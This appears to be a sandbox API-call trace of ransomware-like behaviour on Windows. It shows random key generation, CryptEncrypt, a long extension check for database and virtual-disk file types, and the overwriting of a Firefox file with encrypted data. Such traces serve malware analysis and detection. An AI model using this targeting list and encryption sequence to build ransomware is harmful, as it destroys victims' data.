1 [0140.034] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeea40 | out: hHeap=0xea0000) returned 1 [0140.034] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed030 | out: hHeap=0xea0000) returned 1 [0140.034] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0140.034] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0140.034] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0140.035] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk")) returned 0x20 [0140.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\softokn3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0140.037] GetLastError () returned 0x0 [0140.037] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=899) returned 1 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".4dd") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".4dl") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accdb") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accdc") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accde") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accdr") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accdt") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accft") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".adb") returned 0x0 [0140.037] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ade") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".adf") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".adp") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".arc") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ora") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".alf") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ask") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".btr") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".bdf") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".cat") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".cdb") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ckp") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".cma") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".cpd") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dacpac") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dad") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dadiagrams") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".daschema") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".db") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".db-shm") returned 0x0 [0140.038] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".db-wal") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".db3") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbc") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbf") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbs") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbt") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbv") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dbx") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dcb") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dct") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dcx") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ddl") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dlis") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dp1") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dqy") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dsk") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dsn") returned 0x0 [0140.039] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dtsx") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".dxl") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".eco") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ecx") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".edb") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".epim") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".exb") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fcd") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fdb") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fic") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fmp") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fmp12") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fmpsl") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fol") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fp3") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fp4") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fp5") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fp7") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fpt") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".frm") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".gdb") returned 0x0 [0140.040] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".grdb") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".gwi") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".hdb") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".his") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ib") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".idb") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ihx") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".itdb") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".itw") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".jet") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".jtx") returned 0x0 [0140.041] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".kdb") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".kexi") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".kexic") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".kexis") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".lgc") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".lwx") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".maf") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".maq") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mar") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mas") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mav") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mdb") returned 0x0 [0140.044] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mdf") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mpd") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mrg") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mud") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mwb") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".myd") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ndf") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nnt") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nrmlib") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ns2") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ns3") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".ns4") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nsf") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nv") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nv2") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nwdb") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nyf") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".odb") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".oqy") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".orx") returned 0x0 [0140.045] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".owc") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".p96") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".p97") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".pan") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".pdb") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".pdm") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".pnz") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".qry") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".qvd") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rbf") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rctd") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rod") returned 0x0 [0140.046] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rodx") returned 0x0 [0140.048] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rpd") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".rsd") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sas7bdat") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sbf") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".scx") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sdb") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sdc") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sdf") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sis") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".spq") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sql") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sqlite") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sqlite3") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".sqlitedb") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".te") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".temx") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".tmd") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".tps") returned 0x0 [0140.049] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".trc") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".trm") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".udb") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".udl") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".usr") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".v12") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vis") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vpd") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vvv") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".wdb") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".wmdb") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".wrk") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".xdb") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".xld") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".xmlff") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".abcddb") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".abs") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".abx") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".accdw") returned 0x0 [0140.050] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".adn") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".db2") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".fm5") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".hjt") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".icg") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".icr") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".kdb") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".lut") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".maw") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mdn") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".mdt") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vdi") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vhd") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmdk") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".pvm") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmem") returned 0x0 [0140.051] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmsn") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmsd") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".nvram") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmx") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".raw") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".qcow2") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".subvol") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".bin") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vsv") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".avhd") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmrs") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vhdx") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".avdx") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".vmcx") returned 0x0 [0140.052] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\softokn3.chk", lpSrch=".iso") returned 0x0 [0140.052] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.052] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0140.120] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0140.120] SetEndOfFile (hFile=0x210) returned 1 [0140.201] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.201] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x383, lpOverlapped=0x0) returned 1 [0140.201] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffffc7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.201] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x383, lpOverlapped=0x0) returned 1 